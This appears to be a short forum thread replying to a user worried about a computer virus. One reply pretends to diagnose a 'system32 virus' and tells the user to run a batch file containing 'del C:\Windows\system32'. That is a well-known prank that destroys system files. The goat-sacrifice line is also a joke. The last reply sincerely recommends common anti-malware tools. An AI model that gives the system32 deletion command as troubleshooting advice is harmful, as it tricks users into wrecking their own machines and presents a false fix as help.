Did you had to install the picture lol...

It seems you have a system32 virus. You have to get rid of it as soon as possible.
type in notepad:
@echo off
del C:\Windows\system32

Then save as .bat extension and double click it.
first you Delete C:\\Windows\System32 and sacrifice a goat to your dearest god. Your problem will be solved
you have to do it both otherwise it wont work.

Just download Malwarebytes' Anti-Malware or Hitmanpro 32/64 bit depending on what kind of a processor you have and leave one of them running they should do the job...
